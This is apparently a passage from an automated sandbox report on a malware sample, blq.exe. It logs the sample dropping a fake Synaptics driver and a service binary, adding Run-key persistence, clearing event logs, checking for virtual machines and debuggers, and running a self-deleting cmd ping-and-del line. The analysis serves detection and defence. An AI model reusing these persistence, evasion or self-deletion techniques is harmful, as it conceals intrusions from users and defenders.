                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: printworkflowservice.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandbrokerclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\blq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                          Source: C:\ProgramData\Synaptics\Synaptics.exe File written: C:\Users\user\AppData\Local\Temp\l6DX2RD.ini
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                          Source: Binary string: rundll32.pdb source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: encvbk.exe.4.dr Static PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
                          Source: C:\Users\user\Desktop\._cache_blq.exe Code function: 1_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA,1_2_00401B6B
                          Source: encvbk.exe.4.dr Static PE information: section name: .didat
                          Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 3_2_054E000C push 10005A16h; retf 3_2_054E005D
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_10004C68 push eax; ret 4_2_10004C86
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_10004CA0 push eax; ret 4_2_10004CCE
                          Source: C:\Windows\SysWOW64\encvbk.exe Code function: 10_2_00DD6883 push ecx; ret 10_2_00DD6896
                          Source: C:\Windows\SysWOW64\encvbk.exe Code function: 10_2_00DD682D push ecx; ret 10_2_00DD6840

                          Persistence and Installation Behavior

                          Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1
                          Source: C:\Windows\SysWOW64\svchost.exe Executable created and started: C:\Windows\SysWOW64\encvbk.exe
                          Source: C:\Users\user\Desktop\blq.exe File created: C:\ProgramData\Synaptics\RCXAFD2.tmp
                          Source: C:\Users\user\Desktop\._cache_blq.exe File created: C:\Program Files (x86)\6795234.dll
                          Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Windows\SysWOW64\encvbk.exe
                          Source: C:\Users\user\Desktop\blq.exe File created: C:\ProgramData\Synaptics\Synaptics.exe
                          Source: C:\Users\user\Desktop\blq.exe File created: C:\Users\user\Desktop\._cache_blq.exe
                          Source: C:\Users\user\Desktop\._cache_blq.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\encvbk
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle,4_2_10001A43
                          Source: C:\Users\user\Desktop\blq.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Users\user\Desktop\._cache_blq.exe Process created: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: C:\Users\user\Desktop\._cache_blq.exe Code function: 1_2_00402400 IsIconic,1_2_00402400
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_1000265E OpenEventLogA,ClearEventLogA,CloseEventLog,4_2_1000265E
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10003E6B LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,4_2_10003E6B
                          Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\Desktop\blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\encvbk.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\._cache_blq.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-373
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 536
                          Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9462
                          Source: C:\Windows\SysWOW64\encvbk.exeWindow / User API: threadDelayed 1471
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 4023
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 5938
                          Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-1591
                          Source: C:\Users\user\Desktop\._cache_blq.exeDropped PE file which has not been started: C:\Program Files (x86)\6795234.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8104Thread sleep count: 86 > 30
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8104Thread sleep time: -5160000s >= -30000s
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6784Thread sleep time: -60000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep count: 536 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep time: -536000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep count: 9462 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7676Thread sleep time: -9462000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8008Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\SysWOW64\encvbk.exe TID: 8080Thread sleep count: 1471 > 30
                          Source: C:\Windows\SysWOW64\encvbk.exe TID: 8080Thread sleep time: -735500s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\splwow64.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_1000358C GetSystemInfo,wsprintfA,4_2_1000358C
                          Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData
                          Source: Amcache.hve.18.drBinary or memory string: VMware
                          Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
                          Source: encvbk.exe, 0000000A.00000002.4116954819.000000000303A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                          Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3346246364.000002A314C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: svchost.exe, 00000009.00000002.3346246364.000002A314C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                          Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: svchost.exe, 00000009.00000002.3344318115.000002A30F62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.18.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.18.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.18.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Windows\SysWOW64\encvbk.exeAPI call chain: ExitProcess graph end nodegraph_10-2037
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information queried: ProcessInformation
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPort
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD5E4F LdrResolveDelayLoadedAPI,10_2_00DD5E4F
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD25B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,10_2_00DD25B2
                          Source: C:\Users\user\Desktop\._cache_blq.exeCode function: 1_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA,1_2_00401B6B
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD3F6B mov esi, dword ptr fs:[00000030h]10_2_00DD3F6B
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10003D5D FreeLibrary,free,VirtualFree,GetProcessHeap,HeapFree,4_2_10003D5D
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD6510 SetUnhandledExceptionFilter,10_2_00DD6510
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD61C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00DD61C0
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\Users\user\Desktop\._cache_blq.exe "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                          Source: C:\Users\user\Desktop\blq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_1000304F wsprintfA,strlen,strlen,strlen,GetLocalTime,wsprintfA,strlen,4_2_1000304F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_1000336E ServiceMain,strncpy,wcstombs,RegisterServiceCtrlHandlerA,FreeConsole,GetVersionExA,MainThread,GetCurrentDirectoryA,lstrcatA,lstrcatA,lstrcatA,GetSystemDirectoryA,lstrcatA,CopyFileA,GetFileAttributesA,GetLastError,wsprintfA,GetModuleFileNameA,wsprintfA,Sleep,GetExitCodeProcess,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,4_2_1000336E
Source: Amcache.hve.18.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.18.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.18.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: ._cache_blq.exe | Binary or memory string: 360tray.exe
Source: Amcache.hve.18.dr | Binary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

Source: Yara match | File source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7664, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: encvbk.exe PID: 8056, type: MEMORYSTR
Source: Yara match | File source: C:\Program Files (x86)\6795234.dll, type: DROPPED
Source: Yara match | File source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPED
Source: Yara match | File source: blq.exe, type: SAMPLE
Source: Yara match | File source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: blq.exe PID: 7560, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\RCXAFD2.tmp, type: DROPPED

                          Remote Access Functionality

Source: Yara match | File source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7664, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: encvbk.exe PID: 8056, type: MEMORYSTR
Source: Yara match | File source: C:\Program Files (x86)\6795234.dll, type: DROPPED
Source: Yara match | File source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
